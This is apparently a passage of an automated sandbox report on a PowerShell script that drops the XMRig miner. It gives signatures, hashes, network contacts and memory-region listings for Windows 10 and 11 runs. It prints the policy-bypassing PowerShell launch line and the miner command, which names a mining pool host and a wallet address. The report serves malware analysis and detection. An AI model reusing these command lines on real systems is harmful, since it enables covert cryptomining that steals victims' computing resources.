| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3624-47-0x0000019AF2990000-0x0000019AF29B0000-memory.dmp
memory/3624-48-0x0000019AF29D0000-0x0000019AF29F0000-memory.dmp
memory/3624-49-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-51-0x0000019AF2A10000-0x0000019AF2A30000-memory.dmp
memory/3624-50-0x0000019AF29F0000-0x0000019AF2A10000-memory.dmp
memory/3624-52-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/2696-53-0x00007FFCA8693000-0x00007FFCA8695000-memory.dmp
memory/2696-54-0x00007FFCA8690000-0x00007FFCA9151000-memory.dmp
memory/3624-55-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/2696-56-0x00007FFCA8690000-0x00007FFCA9151000-memory.dmp
memory/3624-57-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-58-0x0000019AF29F0000-0x0000019AF2A10000-memory.dmp
memory/3624-59-0x0000019AF2A10000-0x0000019AF2A30000-memory.dmp
memory/3624-60-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-61-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-62-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-63-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-64-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-65-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-66-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-67-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-68-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-69-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-70-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-71-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-72-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-73-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-74-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-75-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-76-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-77-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-78-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-79-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-80-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-81-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-82-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-83-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-84-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-85-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-86-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-87-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-88-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-89-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-90-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-91-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-92-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-93-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-94-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-95-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-96-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-97-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-98-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-99-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-100-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-101-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-102-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-103-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-104-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-105-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-106-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-107-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-108-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-109-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-110-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-111-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-112-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-113-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-114-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-115-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-116-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-117-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
memory/3624-118-0x00007FF7C8AE0000-0x00007FF7C9713000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4388 wrote to memory of 1124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4388 wrote to memory of 1124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4388-3-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp
memory/4388-5-0x000002B2D7AF0000-0x000002B2D7B12000-memory.dmp
memory/4388-6-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp
memory/4388-9-0x000002B2D7CA0000-0x000002B2D7D16000-memory.dmp
memory/4388-10-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yojgzg5s.ilz.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4388-25-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp
memory/4388-48-0x000002B2D7C80000-0x000002B2D7C92000-memory.dmp
memory/4388-61-0x000002B2D7AE0000-0x000002B2D7AEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1124-90-0x0000028370B90000-0x0000028370BB0000-memory.dmp
memory/1124-91-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/4388-92-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp
memory/4388-94-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp
memory/1124-93-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/4388-95-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp
memory/1124-96-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-97-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-98-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-99-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-100-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-101-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-102-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-103-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-104-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-105-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-106-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-107-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-108-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-109-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-110-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-111-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-112-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-113-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-114-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-115-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-116-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-117-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-118-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-119-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-120-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-121-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-122-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-123-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-124-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-125-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-126-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-127-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-128-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-129-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-130-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-131-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-132-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-133-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-134-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-135-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-136-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-137-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-138-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-139-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-140-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-141-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-142-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-143-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-144-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-145-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-146-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-147-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-148-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-149-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-150-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-151-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-152-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-153-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-154-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-155-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
memory/1124-156-0x00007FF7E6B60000-0x00007FF7E7793000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:02
Platform
win11-20240611-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3740 wrote to memory of 1520 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3740 wrote to memory of 1520 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.227.13:443 | tcp | |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3740-0-0x00007FFE8AE73000-0x00007FFE8AE75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jt1ogb5c.uld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3740-9-0x0000017EDB330000-0x0000017EDB352000-memory.dmp
memory/3740-10-0x00007FFE8AE70000-0x00007FFE8B932000-memory.dmp
memory/3740-11-0x00007FFE8AE70000-0x00007FFE8B932000-memory.dmp
memory/3740-12-0x00007FFE8AE70000-0x00007FFE8B932000-memory.dmp
memory/3740-14-0x0000017EDB460000-0x0000017EDB472000-memory.dmp
memory/3740-15-0x0000017EDB440000-0x0000017EDB44A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1520-46-0x00000255E6680000-0x00000255E66A0000-memory.dmp
memory/1520-47-0x00000255E66C0000-0x00000255E66E0000-memory.dmp
memory/1520-48-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/3740-49-0x00007FFE8AE70000-0x00007FFE8B932000-memory.dmp
memory/1520-51-0x00000255E6700000-0x00000255E6720000-memory.dmp
memory/1520-50-0x00000255E66E0000-0x00000255E6700000-memory.dmp
memory/1520-52-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/3740-53-0x00007FFE8AE73000-0x00007FFE8AE75000-memory.dmp
memory/1520-54-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-57-0x00000255E6700000-0x00000255E6720000-memory.dmp
memory/1520-56-0x00000255E66E0000-0x00000255E6700000-memory.dmp
memory/1520-55-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-58-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-59-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-60-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-61-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-62-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-63-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-64-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-65-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-66-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-67-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-68-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-69-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-70-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-71-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-72-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-73-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-74-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-75-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-76-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-77-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-78-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-79-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-80-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-81-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-82-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-83-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-84-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-85-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-86-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-87-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-88-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-89-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-90-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-91-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-92-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-93-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
memory/1520-94-0x00007FF6843D0000-0x00007FF685003000-memory.dmp
